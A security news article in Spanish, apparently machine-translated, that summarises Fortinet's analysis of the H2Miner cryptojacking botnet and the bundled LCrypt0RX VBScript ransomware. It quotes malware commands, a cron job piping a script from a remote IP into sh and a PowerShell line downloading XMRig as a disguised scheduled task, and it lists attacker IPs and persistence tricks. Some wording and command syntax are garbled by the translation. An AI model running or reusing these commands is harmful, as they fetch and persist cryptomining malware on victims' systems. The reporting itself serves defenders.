La botnet H2Miner, observada por primera vez a fines de 2019, ha resurgido con un arsenal expandido que desdibuja la línea entre criptojacking y ransomware.
La última campaña aprovecha los servidores privados virtuales de bajo costo (VPS) y una bolsa de malware de productos básicos para comprometer los hosts de Linux, las estaciones de trabajo de Windows y las cargas de trabajo de contenedores simultáneamente.
Al encadenar los scripts de shell conscientes de la nube, los binarios de compilación cruzada y los comandos de vida de la tierra, los operadores giran rápidamente desde el punto de apoyo inicial hasta la minería de Monero, a menudo antes de que los defensores noten el aumento en la carga de la CPU.
Los ataques comienzan con la explotación oportunista de servicios mal configurados o aplicaciones vulnerables como Apache ActivemQ (CVE-2023-46604) y Log4Shell.
Una vez dentro, el botnet implementa scripts de cargador a medida: CE.SH en Linux y 1.ps1 en Windows, que terminan mineros competidores, deshabilitan la protección del punto final y obtienen el binario XMRIG de 78.153.140.66. Los contenedores no se salvan: SPR.SH escanean imágenes de Docker y expulsa al agente de Aegis de Alibaba Cloud antes de dejar caer la parada.
La misma infraestructura aloja un servidor de equipo de Cobalt Strike a 47.97.113.36 y repositorios de Bitbucket que disfrazan las cargas útiles como “MicrosoftSoftware.exe”, que ilustra un diseño maduro de comandos de múltiples niveles (C2).
Analistas de Fortinet anotado Que un nuevo ransomware VBScript, LCrypt0RX, ahora se agrupa junto con los mineros.
Lógica de cifrado e implementación de XOR (fuente – Fortinet)
Aunque su rutina de cifrado es rudimentaria: una llave XOR XOR de 8,192 caracteres cosida a una sal por archivo, el script aún sobrescribe el registro de arranque maestro y camina el sistema con ganchos de persistencia señuelo.
Manipulación de atributos y sobrescritura de MBR (fuente – Fortinet)
La superposición de las billeteras y las direcciones de alojamiento sugiere colaboración o control directo por la tripulación original de H2Miner.
Historial de comandos de entrada y compensación de Cron (Fuente – Fortinet)
Esto muestra que cómo CE.Sh implanta un trabajo cron que se vuelve a descargar cada diez minutos:-
(crontab -l 2>/dev/null; \ echo ” */10 * * * * curl -fssl http://80.64.16.241/ce.sh | sh”) | Crontab –
Además de esto, resalta la contraparte de Windows, donde 1.ps1 registra a XMRIG como una tarea programada:
$ miner = “$ env: temp \ sysupdate.exe” invoke -webRequest -uri “http://78.153.140.66/xmrig.exe” -outfile $ miner schtasks /create /f /tn “Servicio de actualización para el servicio de Windows” ` /tr” $ miner ” /sc mind /mo 15 /rl más alto
Mecanismo de infección y persistencia
La potencia pegajosa de H2Miner proviene de su secuencia de infección en capas. Los scripts de shell iniciales enumeran los procesos defensivos, los matan con brutales expresiones regulares y limpian los senderos de auditoría limpiando el historial de shell.
Desfacionado de papel tapiz (Fuente – Fortinet)
En Windows, LCrypt0rx se intensifica a través de Shell.Aplicación para relanzar con wscript.exe /elevado, luego intenta consolidar la persistencia al escribir mal su camino hacia las teclas Winlogan Shell e Ifeo.
Mientras que esa lógica del registro falla, el malware compensa al incorporar seis scripts auxiliares, desde advapi32_ext.vbs, que se disparan a través de TaskKill /F /im *av *.exe, a USB_BRIDGE.VBS, un propagador automático de Autorun.
Cada ayudante se cae con los atributos +H +S +R e invoca en HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run, asegurando que al menos una copia sobrevive a la limpieza.
Este enfoque de cinturón y susoplidor, junto con scripts de actualizadores frecuentes como CPR.SH, permite que los mineros de reaparición de Botnet incluso después de un desalojo parcial.
Para los defensores, eso significa que la remediación de punto final debe incluir imágenes de contenedores, tareas programadas, entradas cron y claves de registro deshonesto; De lo contrario, las billeteras de Monero, en particular 4ask4rhu … P8SAHC, continuarán siushoning ciclos de cómputo robados mucho después de que se cierre la primera alerta.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
